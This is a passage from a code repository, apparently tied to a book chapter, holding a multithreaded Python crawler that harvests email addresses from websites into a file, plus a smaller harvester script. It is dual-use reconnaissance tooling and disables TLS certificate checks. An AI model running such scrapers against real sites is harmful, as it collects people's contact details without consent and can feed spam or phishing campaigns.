warnings.filterwarnings("ignore") 9 | 10 | import requests 11 | from bs4 import BeautifulSoup 12 | import colorama 13 | 14 | # init the colorama module 15 | colorama.init() 16 | 17 | # initialize some colors 18 | GREEN = colorama.Fore.GREEN 19 | GRAY = colorama.Fore.LIGHTBLACK_EX 20 | RESET = colorama.Fore.RESET 21 | YELLOW = colorama.Fore.YELLOW 22 | RED = colorama.Fore.RED 23 | 24 | EMAIL_REGEX = r"""(?:[a-z0-9!#$%&'*+=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f]){2,12})\])""" 25 | # EMAIL_REGEX = r"[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]{2,12})*" 26 | 27 | # forbidden TLDs, feel free to add more extensions here to prevent them identified as TLDs 28 | FORBIDDEN_TLDS = [ 29 | "js", "css", "jpg", "png", "svg", "webp", "gz", "zip", "webm", "mp3", 30 | "wav", "mp4", "gif", "tar", "gz", "rar", "gzip", "tgz", 31 | ] 32 | # a list of forbidden extensions in URLs, i.e 'gif' URLs won't be requested 33 | FORBIDDEN_EXTENSIONS = [ 34 | "js", "css", "jpg", "png", "svg", "webp", "gz", "zip", "webm", "mp3", 35 | "wav", "mp4", "gif", "tar", "gz", "rar", "gzip", "tgz", 36 | ] 37 | 38 | # locks to assure mutex, one for output console & another for a file 39 | print_lock = threading.Lock() 40 | file_lock = threading.Lock() 41 | 42 | def is_valid_email_address(email): 43 | """Verify whether `email` is a valid email address 44 | Args: 45 | email (str): The target email address. 
46 | Returns: bool""" 47 | for forbidden_tld in FORBIDDEN_TLDS: 48 | if email.endswith(forbidden_tld): 49 | # if the email ends with one of the forbidden TLDs, return False 50 | return False 51 | if re.search(r"\..{1}$", email): 52 | # if the TLD has a length of 1, definitely not an email 53 | return False 54 | elif re.search(r"\..*\d+.*$", email): 55 | # TLD contain numbers, not an email either 56 | return False 57 | # return true otherwise 58 | return True 59 | 60 | 61 | def is_valid_url(url): 62 | """ 63 | Checks whether `url` is a valid URL. 64 | """ 65 | parsed = urlparse(url) 66 | return bool(parsed.netloc) and bool(parsed.scheme) 67 | 68 | 69 | def is_text_url(url): 70 | """Returns False if the URL is one of the forbidden extensions. 71 | True otherwise""" 72 | for extension in FORBIDDEN_EXTENSIONS: 73 | if url.endswith(extension): 74 | return False 75 | return True 76 | 77 | 78 | class Crawler(threading.Thread): 79 | def __init__(self, first_url, delay, crawl_external_urls=False, max_crawl_urls=30): 80 | # Call the Thread class's init function 81 | super().__init__() 82 | self.first_url = first_url 83 | self.delay = delay 84 | # whether to crawl external urls than the domain specified in the first url 85 | self.crawl_external_urls = crawl_external_urls 86 | self.max_crawl_urls = max_crawl_urls 87 | # a dictionary that stores visited urls along with their HTML content 88 | self.visited_urls = {} 89 | # domain name of the base URL without the protocol 90 | self.domain_name = urlparse(self.first_url).netloc 91 | # simple debug message to see whether domain is extracted successfully 92 | # print("Domain name:", self.domain_name) 93 | # initialize the set of links (unique links) 94 | self.internal_urls = set() 95 | self.external_urls = set() 96 | # initialize the queue that will be read by the email spider 97 | self.urls_queue = Queue() 98 | # add the first URL to the queue 99 | self.urls_queue.put(self.first_url) 100 | # a counter indicating the total number of 
URLs visited 101 | # used to stop crawling when reaching `self.max_crawl_urls` 102 | self.total_urls_visited = 0 103 | 104 | def get_all_website_links(self, url): 105 | """ 106 | Returns all URLs that is found on `url` in which it belongs to the same website 107 | """ 108 | # all URLs of `url` 109 | urls = set() 110 | # make the HTTP request 111 | res = requests.get(url, verify=False, timeout=10) 112 | # construct the soup to parse HTML 113 | soup = BeautifulSoup(res.text, "html.parser") 114 | # store the visited URL along with the HTML 115 | self.visited_urls[url] = res.text 116 | for a_tag in soup.findAll("a"): 117 | href = a_tag.attrs.get("href") 118 | if href == "" or href is None: 119 | # href empty tag 120 | continue 121 | # join the URL if it's relative (not absolute link) 122 | href = urljoin(url, href) 123 | parsed_href = urlparse(href) 124 | # remove URL GET parameters, URL fragments, etc. 125 | href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path 126 | if not is_valid_url(href): 127 | # not a valid URL 128 | continue 129 | if href in self.internal_urls: 130 | # already in the set 131 | continue 132 | if self.domain_name not in href: 133 | # external link 134 | if href not in self.external_urls: 135 | # debug message to see external links when they're found 136 | # print(f"{GRAY}[!] External link: {href}{RESET}") 137 | # external link, add to external URLs set 138 | self.external_urls.add(href) 139 | if self.crawl_external_urls: 140 | # if external links are allowed to extract emails from, 141 | # put them in the queue 142 | self.urls_queue.put(href) 143 | continue 144 | # debug message to see internal links when they're found 145 | # print(f"{GREEN}[*] Internal link: {href}{RESET}") 146 | # add the new URL to urls, queue and internal URLs 147 | urls.add(href) 148 | self.urls_queue.put(href) 149 | self.internal_urls.add(href) 150 | return urls 151 | 152 | def crawl(self, url): 153 | """ 154 | Crawls a web page and extracts all links. 
155 | You'll find all links in `self.external_urls` and `self.internal_urls` attributes. 156 | """ 157 | # if the URL is not a text file, i.e not HTML, PDF, text, etc. 158 | # then simply return and do not crawl, as it's unnecessary download 159 | if not is_text_url(url): 160 | return 161 | # increment the number of URLs visited 162 | self.total_urls_visited += 1 163 | with print_lock: 164 | print(f"{YELLOW}[*] Crawling: {url}{RESET}") 165 | # extract all the links from the URL 166 | links = self.get_all_website_links(url) 167 | for link in links: 168 | # crawl each link extracted if max_crawl_urls is still not reached 169 | if self.total_urls_visited > self.max_crawl_urls: 170 | break 171 | self.crawl(link) 172 | # simple delay for not overloading servers & cause it to block our IP 173 | time.sleep(self.delay) 174 | 175 | def run(self): 176 | # the running thread will start crawling the first URL passed 177 | self.crawl(self.first_url) 178 | 179 | 180 | 181 | class EmailSpider: 182 | def __init__(self, crawler: Crawler, n_threads=20, output_file="extracted-emails.txt"): 183 | self.crawler = crawler 184 | # the set that contain the extracted URLs 185 | self.extracted_emails = set() 186 | # the number of threads 187 | self.n_threads = n_threads 188 | self.output_file = output_file 189 | 190 | 191 | def get_emails_from_url(self, url): 192 | # if the url ends with an extension not in our interest, 193 | # return an empty set 194 | if not is_text_url(url): 195 | return set() 196 | # get the HTTP Response if the URL isn't visited by the crawler 197 | if url not in self.crawler.visited_urls: 198 | try: 199 | with print_lock: 200 | print(f"{YELLOW}[*] Getting Emails from {url}{RESET}") 201 | r = requests.get(url, verify=False, timeout=10) 202 | except Exception as e: 203 | with print_lock: 204 | print(e) 205 | return set() 206 | else: 207 | text = r.text 208 | else: 209 | # if the URL is visited by the crawler already, 210 | # then get the response HTML directly, no need 
to request again 211 | text = self.crawler.visited_urls[url] 212 | emails = set() 213 | try: 214 | # we use finditer() to find multiple email addresses if available 215 | for re_match in re.finditer(EMAIL_REGEX, text): 216 | email = re_match.group() 217 | # if it's a valid email address, add it to our set 218 | if is_valid_email_address(email): 219 | emails.add(email) 220 | except Exception as e: 221 | with print_lock: 222 | print(e) 223 | return set() 224 | # return the emails set 225 | return emails 226 | 227 | def scan_urls(self): 228 | while True: 229 | # get the URL from the URLs queue 230 | url = self.crawler.urls_queue.get() 231 | # extract the emails from the response HTML 232 | emails = self.get_emails_from_url(url) 233 | for email in emails: 234 | with print_lock: 235 | print("[+] Got email:", email, "from url:", url) 236 | if email not in self.extracted_emails: 237 | # if the email extracted is not in the extracted emails set 238 | # add it to the set and print to the output file as well 239 | with file_lock: 240 | with open(self.output_file, "a") as f: 241 | print(email, file=f) 242 | self.extracted_emails.add(email) 243 | # task done for that queue item 244 | self.crawler.urls_queue.task_done() 245 | 246 | 247 | def run(self): 248 | for t in range(self.n_threads): 249 | # spawn self.n_threads to run self.scan_urls 250 | t = threading.Thread(target=self.scan_urls) 251 | # daemon thread 252 | t.daemon = True 253 | t.start() 254 | 255 | # wait for the queue to empty 256 | self.crawler.urls_queue.join() 257 | print(f"[+] A total of {len(self.extracted_emails)} emails were extracted & saved.") 258 | 259 | 260 | def track_stats(crawler: Crawler): 261 | # print some stats about the crawler & active threads every 5 seconds, 262 | # feel free to adjust this on your own needs 263 | while is_running: 264 | with print_lock: 265 | print(f"{RED}[+] Queue size: {crawler.urls_queue.qsize()}{RESET}") 266 | print(f"{GRAY}[+] Total Extracted External links: 
{len(crawler.external_urls)}{RESET}") 267 | print(f"{GREEN}[+] Total Extracted Internal links: {len(crawler.internal_urls)}{RESET}") 268 | print(f"[*] Total threads running: {threading.active_count()}") 269 | time.sleep(5) 270 | 271 | 272 | def start_stats_tracker(crawler: Crawler): 273 | # wrapping function to spawn the above function in a separate daemon thread 274 | t = threading.Thread(target=track_stats, args=(crawler,)) 275 | t.daemon = True 276 | t.start() 277 | 278 | 279 | if __name__ == "__main__": 280 | parser = argparse.ArgumentParser(description="Advanced Email Spider") 281 | parser.add_argument("url", help="URL to start crawling from & extracting email addresses") 282 | parser.add_argument("-m", "--max-crawl-urls", 283 | help="The maximum number of URLs to crawl, default is 30.", 284 | type=int, default=30) 285 | parser.add_argument("-t", "--num-threads", 286 | help="The number of threads that runs extracting emails" \ 287 | "from individual pages. Default is 10", 288 | type=int, default=10) 289 | parser.add_argument("--crawl-external-urls", 290 | help="Whether to crawl external URLs that the domain specified", 291 | action="store_true") 292 | parser.add_argument("--crawl-delay", 293 | help="The crawl delay in seconds, useful for not overloading web servers", 294 | type=float, default=0.01) 295 | # parse the command-line arguments 296 | args = parser.parse_args() 297 | url = args.url 298 | # set the global variable indicating whether the program is still running 299 | # helpful for the tracker to stop running whenever the main thread stops 300 | is_running = True 301 | # initialize the crawler and start crawling right away 302 | crawler = Crawler(url, max_crawl_urls=args.max_crawl_urls, delay=args.crawl_delay, 303 | crawl_external_urls=args.crawl_external_urls) 304 | crawler.start() 305 | # give the crawler some time to fill the queue 306 | time.sleep(5) 307 | # start the statistics tracker, print some stats every 5 seconds 308 | 
start_stats_tracker(crawler) 309 | # start the email spider that reads from the crawler's URLs queue 310 | email_spider = EmailSpider(crawler, n_threads=args.num_threads) 311 | email_spider.run() 312 | # set the global variable so the tracker stops running 313 | is_running = False 314 | -------------------------------------------------------------------------------- /chapter-6/email-spider/email_harvester.py: -------------------------------------------------------------------------------- 1 | import re 2 | from requests_html import HTMLSession 3 | 4 | url = "https://www.randomlists.com/email-addresses" 5 | EMAIL_REGEX = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])""" 6 | 7 | # initiate an HTTP session 8 | session = HTMLSession() 9 | # get the HTTP Response 10 | r = session.get(url) 11 | # for JAVA-Script driven websites 12 | r.html.render() 13 | 14 | for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()): 15 | print(re_match.group()) -------------------------------------------------------------------------------- /chapter-6/email-spider/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | requests_html 3 | bs4 4 | colorama --------------------------------------------------------------------------------